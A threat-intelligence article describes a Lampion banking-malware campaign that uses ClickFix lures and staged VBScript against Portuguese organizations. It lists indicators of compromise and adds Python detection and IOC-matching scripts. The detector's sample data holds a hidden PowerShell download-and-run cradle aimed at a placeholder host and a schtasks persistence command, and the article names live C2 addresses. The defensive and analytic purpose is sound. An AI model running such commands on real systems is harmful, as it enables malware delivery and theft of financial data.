A newly identified cyber campaign, orchestrated by the actors behind the Lampion banking malware, has escalated threats against Portuguese organizations, with a significant uptick observed between late 2024 and early 2025.
The campaign, primarily targeting entities across the government, finance, and transportation sectors, is notable for its integration of the emerging “ClickFix” social engineering lure, a tactic that manipulates victims into executing malicious system commands under the guise of technical remediation.
Lampion, an infostealer active since at least 2019, continues to evolve its tactics to evade detection and maximize data theft, particularly of sensitive banking information.

The latest attack wave mirrors previous campaigns in target selection and use of heavily obfuscated Visual Basic (VB) scripting, but stands out by adopting the ClickFix method, which has recently gained traction among diverse malware families.
Complex Multi-Stage Infection Chain
According to the report, the infection sequence commences with a phishing email containing a ZIP archive.
Inside, a malicious HTML document redirects users to a website impersonating the legitimate Portuguese tax authority.
Victims are then prompted to copy and execute a PowerShell command (the essence of the ClickFix lure), purportedly to “enable file preview” or resolve technical issues.
This command discreetly downloads and launches an obfuscated VBScript from a remote server, starting a multi-stage attack chain.
Each stage of the malware executes as a separate process, complicating forensic efforts by breaking up the process tree and camouflaging malicious actions as isolated events.
- Stage 1: The initial VBScript, bloated with junk variables and indirect ASCII encoding, writes a second-stage, equally obfuscated script to the system’s temporary directory. Rather than executing directly, it schedules the subsequent stage via a hidden Windows task at a random future time.
- Stage 2: This downloader retrieves another VBScript stager from a cloud-hosted server, disguised as a PHP file.
- Stage 3: A robust, large VBScript (30–50 MB), equipped with evasion and reconnaissance capabilities, checks for security solutions, gathers machine fingerprints, and communicates encoded identifiers to the command-and-control (C2) infrastructure.
- Stage 4: The final payload is a massive DLL loader (>700 MB), fetched from a cloud destination and executed by a scheduled startup command that fires on system reboot. The DLL’s entry point references functions named in Portuguese, diverging from the randomized function identifiers typical of earlier Lampion samples.
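The staged chain above leaves a characteristic process lineage: a user-launched PowerShell that fetches content and hands it to a script host, a script host running a .vbs from the temporary directory, and a VBScript creating a scheduled task for the next stage. The following detection logic is an added example, not code from the report or from any vendor product; the event records are constructed to resemble process-creation telemetry, and the field names and the `example.invalid` host are assumptions rather than observed values.

```python
"""Behavioral detection for the staged ClickFix/VBScript chain described above.

Added example, not code from the original report. Events are constructed to
resemble Sysmon-style process-creation records; the field names are assumed.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry: the ClickFix cradle, the VBScript stager
# scheduling its next stage, and two benign events that must not fire.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell -w hidden -c "iwr http://example.invalid/a.php -o $env:TEMP\\x.vbs; wscript $env:TEMP\\x.vbs"'),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\System32\wscript.exe",
                 r"wscript.exe C:\Users\u\AppData\Local\Temp\x.vbs"),
    ProcessEvent(r"C:\Windows\System32\wscript.exe",
                 r"C:\Windows\System32\schtasks.exe",
                 r'schtasks /create /tn "Updater" /tr "wscript.exe C:\Users\u\AppData\Local\Temp\y.vbs" /sc once /st 03:17'),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Program Files\Foo\foo.exe",
                 r'"C:\Program Files\Foo\foo.exe"'),
    ProcessEvent(r"C:\Windows\System32\svchost.exe",
                 r"C:\Windows\System32\schtasks.exe",
                 r'schtasks /query /tn "\Microsoft\Windows\Defrag\ScheduledDefrag"'),
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Common PowerShell download primitives; extend to taste.
DOWNLOAD_CRADLE = re.compile(
    r"(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|start-bitstransfer)", re.I)
# A .vbs path under a temp directory, the drop location used by Stage 1/2.
TEMP_VBS = re.compile(r"\\(temp|tmp)\\[^\s\"']+\.vbs", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcessEvent) -> list[str]:
    """Return the names of every rule that fires for one event."""
    hits = []
    parent, image, cmd = basename(ev.parent_image), basename(ev.image), ev.command_line
    lowered = cmd.lower()

    # Rule 1: ClickFix cradle. PowerShell started from the shell (explorer.exe)
    # that both fetches remote content and invokes a script host.
    if (parent == "explorer.exe" and image == "powershell.exe"
            and DOWNLOAD_CRADLE.search(cmd)
            and any(host[:-4] in lowered for host in SCRIPT_HOSTS)):
        hits.append("clickfix_powershell_cradle")

    # Rule 2: a script host executing a .vbs out of the temp directory.
    if image in SCRIPT_HOSTS and TEMP_VBS.search(cmd):
        hits.append("vbs_from_temp")

    # Rule 3: a VBScript scheduling another script for a later run
    # (the Stage 1 -> Stage 2 hand-off via a hidden task).
    if (parent in SCRIPT_HOSTS and image == "schtasks.exe"
            and re.search(r"/create", cmd, re.I) and re.search(r"\.vbs", cmd, re.I)):
        hits.append("vbs_schedules_script")
    return hits


def scan(events: list[ProcessEvent]) -> list[tuple[int, str]]:
    """(event index, rule name) for every rule that fires across the events."""
    return [(i, hit) for i, ev in enumerate(events) for hit in classify(ev)]


if __name__ == "__main__":
    for index, rule in scan(SAMPLE_EVENTS):
        print(f"event {index}: {rule}")
```

Each rule keys on the relationship between parent and child rather than on a hash, which is what survives the junk-variable and ASCII-encoding obfuscation the report describes; correlating all three on one host within a short window gives much higher confidence than any single rule.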

While this observed campaign did not ultimately download the final Lampion payload (the relevant code was commented out), the infection chain’s sophistication indicates continued malware development and possible future deployment of more destructive final stages.
Lampion’s reliance on multi-layered obfuscation and staged scheduling, often leveraging scheduled tasks and benign-looking scripts, hinders detection by traditional security tools.
The recent adoption of ClickFix techniques further increases risk by circumventing common user skepticism about macros or executable attachments.
Security specialists recommend proactive user training on ClickFix lures, vigilant monitoring for unusual clipboard and PowerShell activity, and behavioral analytics to identify obfuscated scripting attacks.
Advanced endpoint protection platforms, such as Palo Alto Networks Cortex XDR with its VBS Local Analysis Module, have demonstrated heightened efficacy in detecting these variants by recognizing obfuscated script behaviors.
Lampion’s integration of the ClickFix tactic exemplifies the rapid evolution of malware delivery techniques in financial cybercrime.
As criminals adopt increasingly convincing social engineering strategies, organizations, especially in Portuguese-speaking markets, must bolster technical and educational defenses to mitigate these advanced persistent threats.
Indicators of Compromise (IOC)
Type | Value/Description |
---|---|
Phishing Email Hash | ee4c8e4cce55bd40afa1fb0bc0eee3d7c23d0ebe2db48c2092e854f6ca1472ce |
Stage 1 VBS | 4aeb84dd71588a35084109ff5525c7bff2f30e0ed58ce139621b17f2374bdb35 |
Stage 2 VBS | bba48cf24bb9e6bdcbc79c2241f101e3dd4127ab450e3dbbe1b79fa738f06483 |
Stage 2 VBS | 29b63fcf8e5f08fd12166507b3a85746e3ec685ae0620a124e64125ecd9ccf9b |
Stage 3 VBS | 58fe2a7d4435c9c24c98d33aff1110add4bf95add31558f51289a028ddafcc6e |
Stage 3 VBS | 334dfbaefbf7e6301d2385f95d861eb6dae9018c48fb298a2cbf5f364fbcdb2d |
Stage 3 VBS | 1681c3b88ed315543ac1bf07d258d560cf2f85bfd26c10471d71700eaeb57fb3 |
Stage 4 Loader (IPs) | 5.8.9[.]77, 83.242.96[.]159 |
Domains | Inde-faturas[.]com, autoridade-tributaria[.]com |
C2 URLs | http://18.116.63[.]61/ifeellike.php, http://18.116.63[.]61/trogloditas.php (and others) |
C2 Cloud IPs | 18.221.69[.]167, 18.222.97[.]143, 18.116.15[.]129, 18.220.96[.]58, etc. |
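The indicators above are defanged (`[.]` instead of `.`), so they must be normalized before they can be matched against logs. The script below is an added example, not code from the article: it refangs the table's values, builds a lookup index, and sweeps a handful of constructed DNS, proxy and endpoint log lines for domain, IP, URL and SHA-256 matches. The log lines and the log field names are constructed; only the indicator values come from the page.

```python
"""Refang the defanged IOCs from the table above and match them against logs.

Added example, not part of the original article. Indicator values are the ones
listed on the page; the log lines and their format are constructed.
"""
import re

DEFANGED_IOCS = {
    "domain": ["Inde-faturas[.]com", "autoridade-tributaria[.]com"],
    "ip": ["5.8.9[.]77", "83.242.96[.]159", "18.221.69[.]167",
           "18.222.97[.]143", "18.116.15[.]129", "18.220.96[.]58"],
    "url": ["http://18.116.63[.]61/ifeellike.php", "http://18.116.63[.]61/trogloditas.php"],
    "sha256": [
        "ee4c8e4cce55bd40afa1fb0bc0eee3d7c23d0ebe2db48c2092e854f6ca1472ce",
        "4aeb84dd71588a35084109ff5525c7bff2f30e0ed58ce139621b17f2374bdb35",
        "bba48cf24bb9e6bdcbc79c2241f101e3dd4127ab450e3dbbe1b79fa738f06483",
        "29b63fcf8e5f08fd12166507b3a85746e3ec685ae0620a124e64125ecd9ccf9b",
        "58fe2a7d4435c9c24c98d33aff1110add4bf95add31558f51289a028ddafcc6e",
        "334dfbaefbf7e6301d2385f95d861eb6dae9018c48fb298a2cbf5f364fbcdb2d",
        "1681c3b88ed315543ac1bf07d258d560cf2f85bfd26c10471d71700eaeb57fb3",
    ],
}


def refang(value: str) -> str:
    """Undo common defanging ('[.]', 'hxxp') and lower-case for matching."""
    return value.replace("[.]", ".").replace("hxxp", "http").lower()


def build_index(iocs: dict) -> dict:
    """kind -> set of refanged indicators; URL hosts are also indexed as IPs."""
    idx = {kind: {refang(v) for v in values} for kind, values in iocs.items()}
    for url in idx["url"]:
        host = re.match(r"https?://([^/:]+)", url)
        if host:
            idx["ip"].add(host.group(1))
    return idx


# Dotted-quad IP or dotted host name; 64-hex-char SHA-256.
HOST_RE = re.compile(r"\b((?:\d{1,3}\.){3}\d{1,3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)\b", re.I)
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b", re.I)


def match_line(line: str, idx: dict) -> list[tuple[str, str]]:
    """Return every (kind, indicator) pair found in a single log line."""
    found = []
    for token in HOST_RE.findall(line):
        t = token.lower()
        if t in idx["domain"]:
            found.append(("domain", t))
        elif t in idx["ip"]:
            found.append(("ip", t))
    for digest in SHA256_RE.findall(line):
        if digest.lower() in idx["sha256"]:
            found.append(("sha256", digest.lower()))
    lowered = line.lower()
    for url in idx["url"]:
        if url in lowered:
            found.append(("url", url))
    return found


# Constructed sample log lines (DNS, proxy, endpoint file-creation).
SAMPLE_LOGS = [
    "2025-01-14T09:12:03Z dns query client=10.0.0.21 qname=autoridade-tributaria.com type=A",
    "2025-01-14T09:12:05Z proxy client=10.0.0.21 url=http://18.116.63.61/ifeellike.php status=200",
    "2025-01-14T09:20:00Z edr file_create path=C:\\Users\\u\\AppData\\Local\\Temp\\x.vbs "
    "sha256=4AEB84DD71588A35084109FF5525C7BFF2F30E0ED58CE139621B17F2374BDB35",
    "2025-01-14T09:25:00Z dns query client=10.0.0.22 qname=updates.example.org type=A",
]


def scan(lines: list[str], iocs: dict = DEFANGED_IOCS) -> dict[int, list[tuple[str, str]]]:
    """Line index -> matches, for every line that hits at least one indicator."""
    idx = build_index(iocs)
    return {i: hits for i, line in enumerate(lines) if (hits := match_line(line, idx))}


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOGS).items():
        print(index, hits)
```

Hash matching is case-insensitive because endpoint tools disagree on hex case, and the URL host is indexed as an IP on its own so a DNS or NetFlow record that never sees the full path still matches. The table's "(and others)" and "etc." mean this list is a floor, not a complete blocklist.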